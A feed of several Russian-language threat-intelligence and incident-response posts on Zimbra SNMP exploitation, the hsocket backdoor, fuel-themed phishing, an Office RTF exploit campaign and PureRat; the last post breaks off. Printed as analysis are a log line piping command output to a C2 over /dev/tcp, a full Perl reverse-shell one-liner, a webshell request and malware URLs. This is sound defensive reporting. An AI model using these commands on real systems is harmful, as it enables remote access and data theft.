<p>Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.</p>
<p>Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.</p>
</blockquote>
<p>👀 <strong>Сценарий атаки:</p>
<p></strong>1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл <code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt</code> (или <code>versions.txt</code>), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.</p>
<p>2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, <a href="https://t.me/ptescalator/112" rel="noopener" target="_blank">как детектировать инструмент Gsocket</a>.</p>
<p>3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.</p>
<p>4. После шифрования файлов шифровальщик изменяет их расширение на <code>.elock</code>, а также создает в зашифрованных директориях файлы <code>!README_RECOVER.txt</code>, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.</p>
<p>📫 <strong>Как проверить ваш почтовый сервер Zimbra на предмет наличия признаков компрометации?</p>
<p></strong>1. В основном системном журнале почтовой службы<code> /var/log/maillog</code> записи, содержащие подстроку <code>changed from stopped to</code>, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.</p>
<p>Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: <code>grep &quot;changed from stopped to&quot; /var/log/maillog</p>
<p></code>Пример выполнения команды <code>id</code> и передачи ее вывода на С2-сервер злоумышленников:</p>
<pre><code>Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id&gt;/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  

- время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
- [REDACTED_IP_1]: С2 адрес злоумышленников; 
- id&gt;/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.</code></pre>
<p>2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.</p>
<p>Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newermt &#039;2026-07-01&#039;</code> (поиск по дате изменения файла)</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newerBt &#039;2026-07-01&#039;</code> (поиск по дате создания файла)</p>
<p><em>Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку.</p>
<p></em>Также проверьте сервер антивирусными средствами.</p>
<p>3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение <code>/var/log/nginx/access.log</code>) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах (в частности, часто используемый каталог <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>), могут свидетельствовать о наличии WEB-shell&#039;ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.</p>
<p>Пример вывода результата выполнения команды <code>ls</code> в браузер атакующего:</p>
<pre><code>[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.</code></pre>
<p>Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы <a href="https://github.com/Ed1s0nZ/CyberStrikeAI" rel="noopener" target="_blank">CyberStrikeAI</a>, размещенные на нескольких С2-серверах (<em>скриншоты 1 и 2</em>).</p>
<figure class="wp-block-image"><img width="1024" height="834" src="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg 1024w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-300x244.jpg 300w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-768x625.jpg 768w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41.jpg 1045w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 1</figcaption></figure>
<p><code>CyberStrikeAI</code> — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.</p>
<figure class="wp-block-image"><img width="1024" height="523" src="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg 1024w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-300x153.jpg 300w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-768x392.jpg 768w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1536x784.jpg 1536w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-2048x1046.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 2</figcaption></figure>
<p>Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.</p>
<p>💡 <strong>Рекомендуем:</p>
<p></strong>1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.</p>
<p>2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета <code>zimbra-snmp</code>.</p>
<p>3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.</p>
<p><strong>Файловые индикаторы компрометации:</strong></p>
<blockquote>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.tx</code>t или <code>versions.txt</code> — файл, содержащий версию ПО Zimbra;</p>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp</code> — WEB-shell;</p>
<p><code>/opt/zimbra/log/defunct</code> — Gsocket;</p>
<p><code>elockc[a-z]</code> (например, <code>elockcl</code>) — шифровальщик;</p>
<p><code>runloop.sh</code> — скрипт, создаваемый шифровальщиком;</p>
<p><code>!README_RECOVER.txt</code> — записка злоумышленников;</p>
<p><code>*.elock</code> — файлы с расширением <code>.elock</code>.</p>
</blockquote>
<p><strong>Сетевые индикаторы компрометации:</strong></p>
<pre><code>135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35</code></pre>
<p><strong><br />
Gsocket:</strong></p>
<pre><code>*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242</code></pre>
<p><span class="hashtag">#IR</span> <span class="hashtag">#CVE</span> <span class="hashtag">#Malware</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Он вам не gsocket</title>
		<link>/hes-not-your-gsocket/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 08 Sep 2026 14:44:27 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bd-%d0%b2%d0%b0%d0%bc-%d0%bd%d0%b5-gsocket/</guid>

					<description><![CDATA[Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла…]]></description>
										<content:encoded><![CDATA[<p><strong>Он вам не gsocket</strong> 😑</p>
<p>В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент <code>hsocket</code> (не путать с <code>gsocket</code>).</p>
<p>После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.</p>
<p>1️⃣ <code>hsocket</code> — бэкдор, имеющий следующий функционал:</p>
<p>• запуск интерактивной командной оболочки</p>
<p>• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)</p>
<p>• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)</p>
<p>• защита файлов от удаления</p>
<p>• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:</p>
<pre><code>perl -e &quot;use Socket;\$i=\&quot;$hsHOST\&quot;;\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname(&#039;tcp&#039;));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,&#039;&gt;&amp;S&#039;);open(STDOUT,&#039;&gt;&amp;S&#039;);open(STDERR,&#039;&gt;&amp;S&#039;);exec(&#039;sh -i&#039;);};&quot;</code></pre>
<p>• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)</p>
<p>2️⃣ <code>hfsm</code> — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.</p>
<p>3️⃣ <code>.hsrc</code> — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.</p>
<p>В рамках данного исследования нам удалось <a href="https://alexiregar.wordpress.com/" rel="noopener" target="_blank">обнаружить статью</a>, написанную на индонезийском языке, в которой было описано данное ВПО.</p>
<p>Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:</p>
<pre><code>// Fungsi untuk tampilan halaman login
$Warning = &quot;### ⚠️Info!! Terdekteksi Aktivitas Dari&quot;;</code></pre>
<p>Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:</p>
<pre><code>//------------------GECKO SHELL, RECODED BY AYANA--------------------//
&lt;!-- Gecko Folder File Manager --&gt;</code></pre>
<p><strong>IoC:</strong></p>
<pre><code>hsocket.io
/tmp/hs-data/</code></pre>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>АИ-95 с вредоносной присадкой ⛽️</title>
		<link>/ai-95-with-a-malicious-additive/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Tue, 23 Jun 2026 15:51:57 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%b0%d0%b8-95-%d1%81-%d0%b2%d1%80%d0%b5%d0%b4%d0%be%d0%bd%d0%be%d1%81%d0%bd%d0%be%d0%b9-%d0%bf%d1%80%d0%b8%d1%81%d0%b0%d0%b4%d0%ba%d0%be%d0%b9-%e2%9b%bd%ef%b8%8f/</guid>

					<description><![CDATA[АИ-95 с вредоносной присадкой ⛽️ В середине июня командой Threat Intelligence было обнаружено сразу несколько ресурсов, использующих «топливную» тему для вредоносных целей. 0️⃣1️⃣ В рамках первой кампании (скриншот 1) производится угон Telegram-аккаунтов.…]]></description>
										<content:encoded><![CDATA[<p><strong>АИ-95 с вредоносной присадкой ⛽️</strong></p>
<p>В середине июня командой Threat Intelligence было обнаружено сразу несколько ресурсов, использующих «топливную» тему для вредоносных целей.</p>
<p>0️⃣1️⃣ В рамках первой кампании (<em>скриншот 1</em>) производится угон Telegram-аккаунтов. От имени крупной нефтегазовой организации, предоставляющей услуги по продаже топлива физическим лицам, предлагается «забронировать» время для покупки топлива без очередей. В процессе бронирования злоумышленники просят предоставить код подтверждения (<em>скриншот 2</em>), который на деле является кодом двухфакторной аутентификации от Telegram-аккаунта. Отметим, что исходный код ресурсов изобилует комментариями, характерными для кода, сгенерированного большими языковыми моделями.</p>
<p>0️⃣2️⃣ Вторая кампания заманивает «актуальными» данными о доступности топлива, предлагая скачать APK-файл (<em>скриншоты 3 и 4</em>). На вредоносном сайте отображается карта со сведениями о наличии топлива на разных заправках по всей стране (<em>скриншот 5</em>). Статус заправки на карте при этом определяется детерминированным алгоритмом на основании ее координат:</p>
<pre><code>const deterministicStatus = (station) =&gt; {
  const base = Number(station.id ?? station.lat * 1000 + station.lon * 1000);
  const pseudo = Math.abs(Math.sin(base)) % 1;
  if (pseudo &lt; 0.58) return &#039;green&#039;;
  if (pseudo &lt; 0.85) return &#039;yellow&#039;;
  return &#039;red&#039;;
};</code></pre>
<p>Под капотом приложения — инфостилер, среди функций которого сбор с устройства фотографий и текущей геопозиции с последующей отправкой в S3-хранилища, что впоследствии может использоваться для шантажа жертвы и иных целей.</p>
<p>⚠️ <strong>Рекомендации:</strong></p>
<p><strong>•</strong> Не сообщайте третьим лицам и не вводите на сторонних ресурсах никакие коды, приходящие на ваши устройства.</p>
<p><strong>•</strong> Не устанавливайте незнакомые мобильные приложения, а если очень хочется — хотя бы предварительно используйте анализ через песочницу (например, в PT Sandbox 😉).</p>
<p><strong>•</strong> Относитесь критически к любому ресурсу, обнаруженному в интернете, особенно если он эксплуатирует «горячую» тему.</p>
<p><span class="spoiler">• Покупайте электричку.</span></p>
<p><strong>IoCs:</strong></p>
<pre><code>ru-lukoil.online
tes-td.site
voentoplivo.site
gdebenzin.org
sverdlova.online
mobilecash.club

https://s3.eu-central-003.backblazeb2.com/centbrinben/benzin/
https://storage.tacticlib.com/uploads/benzin/

b192114cc04b872095015bcb0d7f708c34680eafbd43ff5393df791ea0dc04e9
140ecec54f6249370cec2f6dc0e5f485af359295bb27f6f458c5b3cf30260e3e
462611f6f8e65229e8b729038438785d447bc4da386a74fafae095b65578525c
51e18c21203e930ab3ca13327dc7d67a404e597fcf3a99f8901fdbfb169da63c
81a623c9a3b3f4a9340dd4c6bdfb5299f247b54f81ae1d39671afcf24229859a
f4102ea1718653528c503dcaaef3a2ea05ddaf6ad782e84ee7d7b2e6b073ffae
15174043fc56ca9fd8c47d2bfc0e0a2f491a17a8805afcc5eb58b8252677ef69</code></pre>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58-1024x1024.jpg 1024w, /wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58-300x300.jpg 300w, /wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58-150x150.jpg 150w, /wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58-768x768.jpg 768w, /wp-content/uploads/2026/06/photo_576@23-06-2026_15-51-58.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="830" src="/wp-content/uploads/2026/06/photo_577@23-06-2026_15-51-58-1024x830.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_577@23-06-2026_15-51-58-1024x830.jpg 1024w, /wp-content/uploads/2026/06/photo_577@23-06-2026_15-51-58-300x243.jpg 300w, /wp-content/uploads/2026/06/photo_577@23-06-2026_15-51-58-768x623.jpg 768w, /wp-content/uploads/2026/06/photo_577@23-06-2026_15-51-58.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="830" src="/wp-content/uploads/2026/06/photo_578@23-06-2026_15-51-58-1024x830.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_578@23-06-2026_15-51-58-1024x830.jpg 1024w, /wp-content/uploads/2026/06/photo_578@23-06-2026_15-51-58-300x243.jpg 300w, /wp-content/uploads/2026/06/photo_578@23-06-2026_15-51-58-768x623.jpg 768w, /wp-content/uploads/2026/06/photo_578@23-06-2026_15-51-58.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="687" src="/wp-content/uploads/2026/06/photo_579@23-06-2026_15-51-58-1024x687.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_579@23-06-2026_15-51-58-1024x687.jpg 1024w, /wp-content/uploads/2026/06/photo_579@23-06-2026_15-51-58-300x201.jpg 300w, /wp-content/uploads/2026/06/photo_579@23-06-2026_15-51-58-768x515.jpg 768w, /wp-content/uploads/2026/06/photo_579@23-06-2026_15-51-58.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#TI</span> <span class="hashtag">#phishing</span> <span class="hashtag">#malware</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Проникнуть в офис через Office</title>
		<link>/enter-the-office-via-office/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 25 Feb 2026 11:11:03 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bf%d1%80%d0%be%d0%bd%d0%b8%d0%ba%d0%bd%d1%83%d1%82%d1%8c-%d0%b2-%d0%be%d1%84%d0%b8%d1%81-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-office/</guid>

					<description><![CDATA[Проникнуть в офис через Office 👨‍💻 Группа киберразведки PT ESC зафиксировала первую фишинговую кампанию с использованием CVE-2026-21509, направленную на российские организации. Злоумышленники распространяют RTF-документы, оформленные под служебную переписку (скриншоты 1–2). Внутри RTF-документа…]]></description>
										<content:encoded><![CDATA[<p><strong>Проникнуть в офис через Office </strong><strong>👨‍💻</strong></p>
<p>Группа киберразведки PT ESC зафиксировала первую фишинговую кампанию с использованием <a href="https://ptsecurity.com/research/trending-vulnerabilities/CVE-2026-21509/" rel="noopener" target="_blank">CVE-2026-21509,</a> направленную на российские организации. Злоумышленники распространяют RTF-документы, оформленные под служебную переписку (<em>скриншоты 1–2</em>).</p>
<p>Внутри RTF-документа встроен OLE-объект с <code>CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B (Shell.Explorer.1)</code>. Данные объекта упакованы в OLE-хранилище; в стриме <code>CONTENTS</code> находится специально сформированный .lnk-ярлык, указывающий на удаленный ресурс (<em>скриншот 3</em>):</p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">\\rostransnadzor.digital@SSL\svn\58\АКТ проверки транспортного средства.lnk</code></span></pre>

<p>Суффикс <code>@SSL</code> активирует WebDAV-редиректор Windows (службу WebClient), превращая обычное UNC-обращение в HTTPS-запрос к внешнему серверу.</p>
<p>CVE-2026-21509 здесь выступает механизмом обхода встроенных защит Microsoft Office при обработке OLE-компонентов. Уязвимость позволяет создать COM-объект и получить доступ к удаленному <code>.lnk</code> сразу после открытия документа, тем самым запуская следующую стадию атаки.</p>
<p>🚮 На момент исследования удаленный ярлык уже был недоступен, поэтому полностью воспроизвести вторую стадию не удалось.</p>
<p>При анализе домена <code>rostransnadzor.digital</code> выявлено, что в его SOA-записи (поле <code>RNAME</code>) указан контактный e-mail <code>gjegoshcappaniesh@gmail.com</code><br />
 — этот же e-mail ранее фигурировал у доменов, использовавшихся в атаках группировки <strong>BoTeam</strong> (<em>скриншот 4</em>). Дополнительно на возможную связь с группировкой указывает повторение характерных артефактов: одинаковое название вредоносных файлов «АКТ проверки транспортного средства» (<em>скриншоты 5–6</em>), а также использование схожего доменного имени <code>rostransnnadzor.ru</code>.</p>
<p>Это позволяет нам предположить, что за кампанией с использованием CVE-2026-21509 может стоять хакерская группировка <strong>BoTeam</strong> 🥷</p>
<p><strong>Для минимизации рисков рекомендуем как можно скорее обновить Microsoft Office до исправленной версии</strong>. Если оперативное обновление невозможно, в качестве временной меры следует заблокировать активацию уязвимого OLE-компонента <code>Shell.Explorer.1 (CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B)</code>.</p>
<p>1️⃣ Необходимо найти либо создать ветку COM Compatibility (путь зависит от типа установки — MSI / Click-to-Run — и разрядности системы 32/64-bit):</p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">MSI 64-bit или MSI 32-bit на 32-bit Windows:
HKLM\SOFTWARE\Microsoft\Office\16.0\Common\COM Compatibility\

MSI 32-bit на 64-bit Windows:
HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\

C2R 64-bit или C2R 32-bit на 32-bit Windows:
HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office\16.0\Common\COM Compatibility\

C2R 32-bit на 64-bit Windows:
HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility</code></span></pre>

<p>2️⃣ Внутри COM Compatibility необходимо создать подраздел <code>{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}</code> и добавить параметр DWORD Compatibility Flags = <code>0x00000400</code>.</p>
<p><strong>IoCs</strong></p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">rostransnadzor.digital
62.3.58.8

ea078216452f5f6d4eea27bbc062286396a5252e2c267ecc3933d05a4e38da15
2bbcbc88d04615079fa17708c62f07ccb138c19bb9ed78ae43f9172cd91931ba</code></span></pre>

<p><span class="hashtag">#TI</span> <span class="hashtag">#APT</span> <span class="hashtag">#Malware</span> <span class="hashtag">#Phishing</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a> (<a href="https://x.com/ptescalator" rel="noopener" target="_blank">X,</a> <a href="https://max.ru/join/V8dhsWy0FytLHcY_2m9KM99gsnBlr0v5RxOZFTOClho" rel="noopener" target="_blank">Max</a>)</p>
<figure class="wp-block-image"><img width="972" height="1024" src="/wp-content/uploads/2026/02/photo_508@25-02-2026_11-11-03-972x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_508@25-02-2026_11-11-03-972x1024.jpg 972w, /wp-content/uploads/2026/02/photo_508@25-02-2026_11-11-03-285x300.jpg 285w, /wp-content/uploads/2026/02/photo_508@25-02-2026_11-11-03-768x809.jpg 768w, /wp-content/uploads/2026/02/photo_508@25-02-2026_11-11-03.jpg 1215w" sizes="auto, (max-width: 972px) 100vw, 972px" /></figure>
<figure class="wp-block-image"><img width="1024" height="545" src="/wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03-1024x545.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03-1024x545.jpg 1024w, /wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03-300x160.jpg 300w, /wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03-768x409.jpg 768w, /wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03-1536x818.jpg 1536w, /wp-content/uploads/2026/02/photo_509@25-02-2026_11-11-03.jpg 1566w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="511" src="/wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-1024x511.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-1024x511.jpg 1024w, /wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-300x150.jpg 300w, /wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-768x383.jpg 768w, /wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-1536x766.jpg 1536w, /wp-content/uploads/2026/02/photo_510@25-02-2026_11-11-03-2048x1022.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="469" src="/wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-1024x469.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-1024x469.jpg 1024w, /wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-300x137.jpg 300w, /wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-768x352.jpg 768w, /wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-1536x703.jpg 1536w, /wp-content/uploads/2026/02/photo_511@25-02-2026_11-11-03-2048x938.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="765" src="/wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-1024x765.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-1024x765.jpg 1024w, /wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-300x224.jpg 300w, /wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-768x574.jpg 768w, /wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-1536x1147.jpg 1536w, /wp-content/uploads/2026/02/photo_512@25-02-2026_11-11-03-2048x1530.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Засунь свои претензии в&#8230; PT Sandbox!</title>
		<link>/shove-your-claims-up-pt-sandbox/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Fri, 06 Feb 2026 15:56:45 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[avlab]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[sandbox]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b7%d0%b0%d1%81%d1%83%d0%bd%d1%8c-%d1%81%d0%b2%d0%be%d0%b8-%d0%bf%d1%80%d0%b5%d1%82%d0%b5%d0%bd%d0%b7%d0%b8%d0%b8-%d0%b2-pt-sandbox/</guid>

					<description><![CDATA[Засунь свои претензии в&#8230; PT Sandbox! 🫵 В конце января мы обнаружили вредоносную кампанию с рассылкой вредоносного PureRat (PureHVNC) по российским организациям финансового сектора. Как и многие подобные рассылки, атака начиналась с…]]></description>
										<content:encoded><![CDATA[<strong>Засунь свои претензии в&#8230; PT Sandbox!</strong> 🫵<br />
<br />
В конце января мы обнаружили вредоносную кампанию с рассылкой вредоносного PureRat (PureHVNC) по российским организациям финансового сектора.<br />
<br />
Как и многие подобные рассылки, атака начиналась с письма под названием «Акт сверки и претензия» (<em>скриншот 1</em>). <br />
<br />
В письме была ссылка на архив:<br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml"><span class="hljs-string">https://github.com/sergo20261/proxi/raw/refs/heads/main/претензия.rar</span></code></span></pre><br />
<br />
с причудливо обфусцированным bat-файлом (<em>скриншот 2</em>).<br />
<br />
🕵️‍♂️ Его функционал прост — всего лишь декодирование из base64 огромного куска данных (перед этим каждое вхождение подстроки <code>`h@`</code> заменяется на <code>`d`</code>) и его последующий запуск, после чего он копирует себя в <code>C:\ProgramData\avtoproxi.bat</code> (<em>скриншот 3</em>).<br />
<br />
Декодированные данные представляют собой PowerShell-скрипт (<em>скриншот 4</em>), который скачивает картинку с URL:<br />
<br />
